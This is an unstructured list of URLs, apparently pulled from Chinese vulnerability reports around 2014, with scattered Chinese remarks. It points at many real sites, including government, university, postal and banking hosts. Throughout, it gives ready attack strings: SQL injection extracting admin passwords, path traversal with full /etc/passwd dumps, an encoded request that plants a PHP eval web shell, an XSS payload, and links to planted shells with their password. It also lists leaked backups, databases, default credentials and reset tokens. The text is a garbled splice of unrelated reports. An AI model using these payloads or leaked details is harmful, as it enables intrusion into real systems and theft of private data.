http://www.wnszxyy.com/guahao.asp?a=1&kid=67 http://www.gd189fq.com/new/ordersuc.php?&orderid=956 http://www.gd189fq.com/new/ordersuc.php?&orderid= http://people.178.com/humen.php?aid=1332 http://www.gansupost.com/bulletin/get_BULLETIN_List.shtml?category=1&start=13 http://www.gansupost.com/xxjs/go_XXJS_List.shtml?category=1 http://www.gansupost.com/intro/go_DJGJ_List.shtml?category=1 
http://www.gansupost.com/bulletin/get_BULLETIN_List.shtml?category=1 http://www.gansupost.com/gjzl/go_GJZL_List.shtml?category=1 http://www.gansupost.com/operation/goOperation.shtml?titleselect=1&operationid=1&itemid=1 http://cw.zhangqiu.gov.cn:8081/weblogin/ http://cw.zhangqiu.gov.cn:8081/weblogin/login.aspx http://cw.zhangqiu.gov.cn:8081/weblogin/loginUser/pLoginUserList.aspx部分密码泄露 http://cpcenter.forrising.com:8001/console http://bbs.paipai.com http://bbs.paipai.com/config/config_global.php.bak http://202.102.116.111:8080/irec/download?fileName=./WEB-INF/web.xml&filePath=./../ http://202.102.116.111:8080/irec/download?fileName=./WEB-INF/classes/struts.xml&filePath=./../ http://202.102.116.111:8080/irec/download?fileName=/WEB-INF/classes/resources/config/datasource/ds-2.xml&filePath=./../ http://202.102.116.111:8080/irec/download?fileName=/WEB-INF/lib/struts2-core-2.3.16.1.jar&filePath=./../ http://202.102.116.111:8080/irec/myUpload https://etrade.gfgroup.com.hk/HKTrade/login.action http://pth.gzucm.edu.cn/index.action http://www.gxnun.net/32nnsztsg/NewsView.asp?id=54 https://mail.kingosoft.com/ http://www.imooc.com/user/resetpasspage?active=MTIzNDU2QDE2My5jb20sMTQxMjc1ODc4Mw==&uuid=NDMwMjc4&linkid=MTE4NTk1 http://xb.swjtu.edu.cn/public/viewSpeech.aspx?ID=42 http://ghc.swjtu.edu.cn/public/viewSingle.aspx?TYPE=2和 http://ghc.swjtu.edu.cn/public/eng.aspx?TYPE=7和 http://ghc.swjtu.edu.cn/public/viewNews.aspx?ID=265 http://lixue.swjtu.edu.cn/jyjx.php?pid=19和 http://lixue.swjtu.edu.cn/zsjy.php?pid=31和 http://lixue.swjtu.edu.cn/xsgz.php?pid=37&id=14984和 http://lixue.swjtu.edu.cn/kxyj.php?pid=26&id=14920和 http://lixue.swjtu.edu.cn/jyjx.php?pid=20&id=14983和 http://lixue.swjtu.edu.cn/xydt.php?pid=49&id=14972和 http://lixue.swjtu.edu.cn/zsjy.php?pid=31&id=14350 https://mail.gssb.gov.cn/ http://www.lxjx.cn/framework/plugin/kindeditor/php/demo.php http://111.1.5.132:8080/Conf/jsp/user/loginAction.do http://111.1.15.81/admin/Index/index verify.doc/a.php 
http://demo.trunkey.com/和另一Nginx站点没有成功(估计早发现了。)这套系统难道是一键安装集成环境,导致出现解析漏洞???如果被非法利用脱裤子的话,造成大量备案信息泄露。。。 http://beian.ocn.net.cn/images/photo//201410/34077c8351ba80f7a8892f659e6fc80e.jpg/a.php http://61.152.94.110/images/photo//201410/7bf360de86ed0eab8a95ebc9d044799f.jpg/a.php http://www.cache.qq500.com/images/photo//201410/21dfbaea116977d6807090422f59726c.jpg/a.php http://ba.online.sh.cn/images/photo//201410/20707367f9979bd3cc15838d920713aa.jpg/a.php http://beian.4bo.cn/images/photo//201410/757dd84ad8ff1af50d9e9591da8d2776.jpg/a.php http://61.152.108.190/images/photo//201410/3e12124d592a2ba19b540a3a7c020b4f.jpg/a.php http://web53406.5udns.cn/images/photo//201410/c5b4619600b838cb096915c1d78bff45.jpg/a.php http://beian.yesjing.com/images/photo//201410/c38eca1519b34af1a9fd0a35a0806156.jpg/a.php http://www.weidc.net/images/photo//201410/2da08be52c91df23489cc42c2cb5d96d.jpg/a.php http://www.qq500.com/images/photo//201410/21dfbaea116977d6807090422f59726c.jpg/a.php http://211.144.210.22/images/photo//201410/3062d9d83a51f938c88a5cd35fbf32ce.jpg/a.php http://61.129.70.11/images/photo//201410/91c2df466f045b1a35baea7cd2ae32b7.jpg/a.php http://www.letuo.net/images/photo//201410/76b364c38c88779e8e6c992bc172104f.jpg/a.php pass:ki11,还有好多,不一一测试了。复现时,麻烦请把shell全删除。貌似比较严重哦。。。。。 http://bbs.chexun.com/3g/view.php?tid= http://wooyun.org/bugs/wooyun-2014-066661 http://wooyun.org/bugs/wooyun-2014-074281 http://localhost/maccms8/index.php?m=vod-search-pg-1-wd-xxxx%2527%2529%253E0%2520or%2520sleep%2528if%25281%252C5%252C1%2529%2529%2529%2523-typeid-5.html http://my.51job.com/cv/EResume/CV_EModDefault.php?ReSumeID=318302541&38698 https://mail.aliyun.com/attachpreview/aps_key_2722238350_714e89975fd1f472dc7d92e39d4860f2.jpg http://x55.me/csrf.htm https://mail.aliyun.com/alimail/ https://124.133.254.82:4443/admin/index https://202.113.49.95/admin/index https://218.28.167.11/admin/index https://202.113.20.208/admin/index http://219.140.193.253/hrss/login.jsp为例子 
http://120.40.72.157:4001/hrss/rm/RmPsnbasdoc.jsp http://ischool.edu.sina.com.cn/?p=school&s=compare&a=schoolcompare&s1=51&s2=364 http://www.xjpost.com.cn/guestbook/search.jsp?search=search http://www.xjpost.com.cn/guestbook/add.jsp?action=add http://www.jingyingfanglue.com/news_detail.asp?id=60499%20union%20se%lect%201,admin,password,password,5,6,7,8,9,10,11,12%20from%20admin_user%20where%20id=1 http://wooyun.org/bugs/wooyun-2014-066661 http://wooyun.org/bugs/wooyun-2014-074281 http://localhost/maccms8/index.php?m=art-search-wd-x%2527%2529%253E0%2520and%2520sleep%2528if%25281%252C5%252C1%2529%2529%2523 https://github.com/keviswang/nbcbmail/blob/0fa7157bf7964429694a12480ccad5a127b3ebfe/Loginmail.py http://www.douguo.com/ http://www.zssy.com.cn/Admin/Manage http://stat.sdcp.cn/stat.aspx?docid=152361存在Sql注入, http://sj.sdcp.cn/qst/qst.aspx?lx=1 http://ucenter.shikee.com/accountsec/editemail http://ucenter.shikee.com/email/verify http://ucenter.shikee.com/email/resetemail?operatetype=1&email=你的邮箱&code=任意六个数字 http://www.wooyun.org/bugs/wooyun-2014-078349/trace/0a7a519f0aa40359cd32007d73cc6e5f http://note.sdo.com/u/635480660904716277/NoteContent/eSOvR~l30NfVM702w000wP http://www.czhos.com http://www.czhos.com//fckeditor/editor/filemdeager/connectors/test.html http://www.czhos.com/enter_page/Upload/FCKEditor/media/1.aspx http://www.czhos.com/enter_page/Upload/FCKEditor/media/img.asp http://10198.bbn.com.cn/beijingtwo/register/register.jsp http://www.ncsshk.com/ http://www.yp.net.cn http://www.qq.com\:%2f%23@www.yp.net.cn www.yp.net.cn这个网站 http://jf.gzuni.com/temp/nopaydetail_.tsv http://jf.gzuni.com/bill/temp/gzrhcaixiquan_info_pack.tsv http://jf.gzuni.com/temp/nopaydetail_201310.tsv http://jf.gzuni.com/temp/nopaydetail_201311.tsv http://jf.gzuni.com/temp/nopaydetail_201312.tsv http://jf.gzuni.com/temp/nopaydetail_201401.tsv http://jf.gzuni.com/temp/nopaydetail_201402.tsv http://jf.gzuni.com/temp/nopaydetail_201403.tsv http://jf.gzuni.com/temp/nopaydetail_201404.tsv 
http://jf.gzuni.com/temp/nopaydetail_201405.tsv http://jf.gzuni.com/temp/nopaydetail_201406.tsv http://jf.gzuni.com/temp/nopaydetail_201407.tsv http://jf.gzuni.com/temp/nopaydetail_201408.tsv http://jf.gzuni.com/temp/nopaydetail_201409.tsv http://jf.gzuni.com/temp/nopaydetail_2014010.tsv http://www.63si.com.cn/sclssbClient/login.html http://www.jyg.gov.cn:5555/ http://www.jyg.gov.cn:5555/dc/ http://www.zaojiao.com http://bk.chinapost.com.cn/vip/login.jsp http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/file/imp_examples.xls http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/login.jsp http://bk.chinapost.com.cn/vip/common/download/down.jsp?filename=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ident:x:98:98::/home/ident:/sbin/nologin netdump:x:34:34:Network user:/var/crash:/bin/bash nscd:x:28:28:NSCD Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin 
pcap:x:77:77::/var/arpwatch:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin canna:x:39:39:Canna User:/var/lib/canna:/sbin/nologin htt:x:100:101:IIIMF Htt:/usr/lib64/im:/sbin/nologin radiusd:x:95:95:radiusd user:/:/bin/false ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false named:x:25:25:Named:/var/named:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash hacluster:x:511:90::/home/hacluster:/bin/bash dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin bea:x:512:512::/home/bea:/bin/bash nsi:x:513:512::/home/nsi:/bin/bash oracle:x:514:513::/oracle:/bin/bash dkhxt:x:515:512::/home/dkhxt:/bin/ksh wisentsoft:x:516:516::/home/wisentsoft:/bin/bash mobile:x:517:512::/home/mobile:/bin/bash www.yajsgh.gov.cn/upload/20141009/12/x.asp URL:http://118.85.207.70:8080/login!loginPage.html http://www.hljiad.com/typelist.jsp?lmid=36&type=1 http://www.weaver.com.cn/ inurl:maint/login/Page.jsp http://27.155.177.113:81/page/maint/login/Page.jsp?templateId=6&logintype=1 http://58.62.113.250:8088/page/maint/login/Page.jsp?templateId=4 http://oa.christine.com.cn/page/maint/login/Page.jsp?templateId=82&null http://www.e-cology.com.cn/page/maint/login/Page.jsp?templateId=18&logintype=2 http://oa.funglian.com/page/maint/login/Page.jsp?templateId=4&logintype=1&message=55 http://12580.10086.cn/new/member/loginReg_addPassword.do?memberno=309966993&type=findPassword&sitepassword=catr1234 http://staff.chinacars.com:8181/spam/system/index.action http://www.lshj.gov.cn:80/hbjfront/xsxxnew.aspx?minid=196 http://kindeditor.net/ 
http://www.bangcle.com/ http://secneo.com/ https://github.com/cxl008/blatta http://www.szsbzx.net.cn:9900/web/website/indexProcess.action http://mail.600795.com.cn:8181/spam/system/index.action http://www.weaver.com.cn/ inurl:homepage/LoginHomepage.jsp http://group.e-cology.cn/homepage/LoginHomepage.jsp?hpid=52&isfromportal=1 http://km.chinadrtv.com/homepage/LoginHomepage.jsp?hpid=21&isfromportal=1&templateId=42&null&templateId=42&null http://oa.eastall.com:8081/homepage/LoginHomepage.jsp?hpid=62&isfromportal=1&templateId=41&null&templateId=41&null http://oa.ankai.com/homepage/LoginHomepage.jsp?hpid=81&opt=privew http://oa.funglian.com/homepage/LoginHomepage.jsp?hpid=83&isfromportal=1&templateId=4&null&templateId=4&null http://ylt.11185.cn/web.rar http://211.156.198.57 http://211.156.198.57/jsp/yzznzd/bbxf/downfile.jsp?filename=//opt//weblogic//Oracle//Middleware//user_projects//domains//yzznzd_domain//app//czsc.zip&paths=//opt//weblogic//Oracle//Middleware//user_projects//domains//yzznzd_domain//app//czsc.zip http://211.156.198.57/jsp/yzznzd/bbxf/downfile.jsp?filename=/wooyun.txt&paths=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false nscd:x:28:28:NSCD Daemon:/:/sbin/nologin zabbix:x:100:101:Zabbix System:/var/lib/zabbix:/sbin/nologin distcache:x:94:94:Distcache:/:/sbin/nologin 
ais:x:39:39:openais Framework:/:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin cyrus:x:76:12:Cyrus Server:/var/lib/imap:/bin/bash dbus:x:81:81:System bus:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin dbmail:x:101:102:DBMail Account:/var/lib/dbmail:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin ident:x:98:98::/:/sbin/nologin mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin hacluster:x:511:90::/home/hacluster:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin privoxy:x:73:73::/etc/privoxy:/sbin/nologin dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ipos:x:512:512::/home/ipos:/bin/bash oracle:x:513:513::/home/oracle:/bin/bash yzznzd:x:514:512::/home/yzznzd:/bin/bash http://wan.sdo.com/ http://www.lib.sxu.edu.cn/details.jsp?ID=212 http://www.conking.com.cn/ Login:LoginName http://www.chengtongka.com/shgllogin.php inurl:servlet/FileDown?fjxxId= https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715 
https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715%20and%201=1 https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715%20and%201=2 http://teleuc.com/ http://meetinglive.teleuc.com//main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://bgifx.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://pop136.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://kuniyasu.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://jkec.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://dcmfx.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://pthl.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://cuconline.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://gzosta.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://semia.teleuc.com/main/downloadC03Client.do?downFileName=../../WEB-INF/web.xml http://es.scnu.edu.cn/ http://es.scnu.edu.cn/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\%27and+char%28@%60%27%60%29+/*!50000Union*/+/*!50000SeLect*/+1,2,3,concat%280x3C6162633E,group_concat%280x7C,userid,0x3a,pwd,0x7C%29,0x3C2F6162633E%29,5,6,7,8,9%20from%20%60%23@__admin%60%23%22 http://xkbm.hebhk.com/adminlogin.aspx http://www.dl-huawen.com/pages/login.jsp http://58.49.58.226:8090/admin/Article/Add http://www.qdgtj.gov.cn/Showhf.asp?ID=93 http://c.liepin.com/ http://article.liepin.com/ask/qa196028 http://c.liepin.com/resume/getdefaultresume/ http://218.57.204.115/index.php?m=Index&a=login http://www.doc88.com/p-608999920248.html http://wm2gmail.263.net/mail/login/opt/loginAction_getLogoBanner.do?domain=test%22;}alert%28/xss/%29%3C/script%3En.com&func=dmloginshow http://www.qhzyy.com.cn/search.aspx?key=1 http://jwc.sxnu.edu.cn/jwcweb/new_show.asp?xw_id=91 
http://www.press.shu.edu.cn/book_category.aspx?Class_ID=1740和 http://www.press.shu.edu.cn/book_reviewid.aspx?Class_ID=346 inurl:homepages/index.aspx http://hf.jjbctv.com/webpages/bjcx_list_page.aspx http://qlgk.taixing.gov.cn/webpages/bjcx_list_page.aspx http://58.222.216.220/ggweb/webpages/bjcx_list_page.aspx http://qlgk.taixing.gov.cn/webpages/bjcx_list_page.aspx http://58.222.216.220/ggweb/webpages/bjcx_list_page.aspx http://hf.jjbctv.com/webpages/bjcx_list_page.aspx http://www.jseic.gov.cn:8081/jxwweb/webpages/bjcx_list_page.aspx http://58.213.129.206:8080/jytweb/webpages/bjcx_list_page.aspx http://www.yiqizou.com/get_map_info.php?user_id=121 http://tui.infzm.com/?a=index&c=login site:hit.edu.cn site:hit.edu.cn http://www.sasacgs.gov.cn/list.jsp?classid=3 http://www.able-elec.com/ http://xx.xx.xx.xx/G2S/AbleSystem/WebSystem/WebSystemIndex.aspx http:/xx.xx.xx.xx/G2S/ZipFile/ZipFlle.aspx http://www.hufe.edu.cn/parts.php?id=293 http://ygxy.rsgis.whu.edu.cn/admin/user.add.php http://www.viacloud.com.cn/ http://portal.viacloud.com.cn/user/login http://www.listentech.com.cn/ http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://brand.66wz.com/store.php?id=18 http://www.hnagri.gov.cn/comm_front/supply/view.jsp?market_id=15576-7399 http://wenda.bootcss.com/question/38 http://bk.11185.cn/index.do,注册了两个用户分别下了两个订单,在登录进去后查看订单,却跳转到了http://it.11185.cn/chinapostintegrate/owner/orderlist.a http://www.shyusrmyy.com/ http://www.shyusrmyy.com/search.asp?keys=2 http://www.qianrengou.com/m.php?m=User&a=doLogin ttp://www.xinjianghu.com.cn/m.php?m=User&a=doLogin http://www.jt306.cn/wap/login/home.do http://202.102.116.81:8080/jsp/front/activity/template/music.jsp?actId=185&channelCode=2623&actRingId=1 http://www.lygbus.com/shownews.php?aou=103 http://183.60.90.133/ http://183.60.90.133/common/shell/BillBack.sh http://www.timber2005.com/ http://px3.timber2005.com/GovUserControl/Demo.aspx http://360-sem.net/GovUserControl/Demo.aspx 
http://www.frpx.cn/GovUserControl/Demo.aspx http://218.106.254.26:801/GovUserControl/Demo.aspx http://px.mqxwdx.cn/GovUserControl/Demo.aspx http://www.jlaav.cn/hyxw.asp?id=1000&view=t http://tjzxfc.com/index.php/Index/search?q=1&__hash__=d04eed84cdaac7b7d81d68a6e259710c http://cpa.cqu.edu.cn/articleShow.php?tid=18&nid=1605和 http://cpa.cqu.edu.cn/articleShow.php?nid=1655 http://www.cmse.cqu.edu.cn/?idx=news&act=show&id=1667 http://219.139.134.9:70/logincheck.php http://www.ccas.com.cn:8008/logincheck.php http://122.144.134.79/logincheck.php http://123.233.240.119/logincheck.php http://61.175.246.20/logincheck.php http://www.swiee.com/index!register.action http://video5.51cto.com/ http://video5.51cto.com/index.php?s=/Auth/user/login http://www.sjzzyy.com/channel.aspx?id=31&s=1 https://e.boc.cn/ehome/#/shopsCommunity/shopDetail/EN1000000300 https://e.boc.cn/ehome/#/shopsCommunity/shopDetail/EN1000000300 http://wx.infzm.com/?c=listen&a=view&id=95459 http://jpkc.zjjcxy.cn/jpkc/sjjcgl/Admin_Login.asp https://e.boc.cn/ehome/#/shopsCommunity/productDetail/EP10000001419 https://e.boc.cn/ehome/#/shopsCommunity/productDetail/EP10000001419 http://113.200.215.173:8080/ http://218.207.206.161:80/ http://218.24.29.30:80/ http://218.26.195.158:80/ http://211.140.220.178:80/ https://open.boc.cn/grouppm/item/23132 http://open.boc.cn/user/doGetPwd?new_password=85bf5831e593431e882887e077400b7f&cfm_password=85bf5831e593431e882887e077400b7f&randomid=&randomen=&randomnn=&randomold=&enctyp=1&code=YToyOntzOjM6InVpZCI7czoxNzoiMjc1NDM3MTMxN0BxcS5jb20iO3M6NToidmNvZGUiO3M6NjoiMTM0MDc2Ijt9&sid=0.45036256207507386 https://e.boc.cn/ehome/#/shopsCommunity/kindProduct/PC1002 https://e.boc.cn/ehome/#/shopsCommunity/kindProduct/PC1002 https://e.boc.cn/ehome/#/shopsCommunity/kindProduct/PC1002 http://www.fzjsqqy.cn/ http://www.fzjsqqy.cn/vreg.aspx?parent_id=1 http://www.fzjsqqy.cn/vreg.aspx?parent_id=1 http://60.161.215.7:8888/main.aspx http://localhost/index.php?comment-view-1 
http://exam.hebsafety.gov.cn/### http://110.249.219.99:7700/RS22/pub/pubQuery.jsp http://www.syyxyszyy.com/default/contents/content/i/182 http://101.227.1.138/10.zip http://101.227.1.138/11.zip http://101.227.1.138/12.zip http://101.227.1.138/13.zip http://101.227.1.138/14.zip http://61.172.247.30:8083/ admin:admin http://www.mbachina.com/plus/subjectajax.php?id=8&page=2 http://www.mbachina.com/down.php?path=../../../../../../../../../../etc/passwd http://www.baomi.org/zytsyx_info.php?optionid=48&auto_id=30 http://www.gzny.gov.cn/e/tool/gbook/xxmrindex.php?lyid=1712 http://221.228.213.154/login.jsp http://www.xxxx.com/sc8/sourceindex/search-byletter.do?pageId=6&letter=J http://114.80.128.174:8089/test/TestDosCommand.aspx http://hr.snda.com http://hr.snda.com/wintalent3/SNDA/web/index/showColumnInfo2!getNewsFromWeb?brandCode=1&webColumnID=5 http://family.meilishuo.com/share/family/vpn/vpn.html http://z.ev123.com/vip_ http://z.ev123.com/vip_****.html http://www.ev123.com/servers/login.php http://www.dlairport.com/DLAirWeb/DLAPFlight.aspx?flightno=aa&No=1 http://www.dlairport.com/DLAirWeb/DLAPFlight.aspx?flightno=aa&No=1 http://www.dlairport.com/DLAirWeb/DLAPFlight.aspx?flightno=aa&No=1 http://www.dlairport.com/DLAirWeb/3_33.aspx http://www.yl.yy.gov.cn/ys.asp?id=110 http://jdx.jsit.edu.cn/look_page_big.asp?yiid=66&erid= http://jdx.jsit.edu.cn/look_page_2.asp?yiid=64&erid=101 http://114.80.134.52:8085/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://116.211.21.204/bbs/bbs.rar http://180.96.39.133/ http://211.136.104.53:8055/fckeditor/editor/filemanager/connectors/aspx/connector.aspx http://211.136.104.52:8055/Standard/DownloadFile.aspx?filename= http://www.hising.com.cn http://www.fty163.com/data/shop.mdb www.bxgpower.com/data/shop.mdb www.gzgema.com/data/shop.mdb http://www.jwyb168.com.cn/data/shop.mdb http://hm.baidu.com/h.js http://101.227.1.153:8084/test/test.cgi http://support.ebs.sdo.com:8085/发现fckeditor,导致全盘遍历 
http://**.**.**/ldczgzxt/gz_admin/login.asp http://zone.wooyun.org/content/4261 http://www.xxxxxx.org/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=121&arrs2[]=98&arrs2[]=97&arrs2[]=107&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://www.xxxxx.org/plus/mytag_js.php?aid=1117 
http://www.xxxxxxxx.org/plus/mybak.php http://voc.sdo.com/ http://www.jincin.com/index.htm tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1 tjtc.jincin.com/information/infor.htm?firstTF=1&Kinds=14&searchName=职场要闻&ResourceId=1 http://cuc.jincin.com/ http://pku.jincin.com/ http://bucea.jincin.com/ http://bucea.jincin.com/ http://bjypc.jincin.com/ http://cauc.jincin.com/ http://ruc.jincin.com/ http://muc.jincin.com/ http://bit.jincin.com/ http://www.71.gov.cn/ http://www.114zb.com/114zb.zip http://mail.bjstats.gov.cn/cgi-bin/search.cgi https://121.8.154.250/cgi-bin/webif/status-basic.sh http://219.142.122.24/ http://219.142.122.24/admin.asp无需用户密码 http://110.249.221.236/CWDoc/Login/LogOn http://218.28.190.186:8080/dthealth/web/csp/logon.csp http://202.113.80.61/ http://202.113.80.61:80/login_check.asp http://ib.htsec.com/ http://ib.htsec.com/names.nsf/$users http://ib.htsec.com/webadmin.nsf即可 http://ib.htsec.com/download/filesets/netuser1.txt即可看到执行结果 http://www.yaofang.cn/a/user/order_detail/8038451 http://www.hk.cntaiping.com http://www.hk.cntaiping.com/product/wooyun.php http://oa.sp12396.cn/ http://med.xinhuamed.com.cn/SearchResult.aspx?cond=1 https://test1auth.ys7.com:8443/signIn?from=4e4148ba90184a7cbd81&r=428326093830372127&returnUrl=plugin&host=test1.ys7.com https://test1.ys7.com https://wap.alipay.com/personal/addContacts.htm?userId=2088802055471039 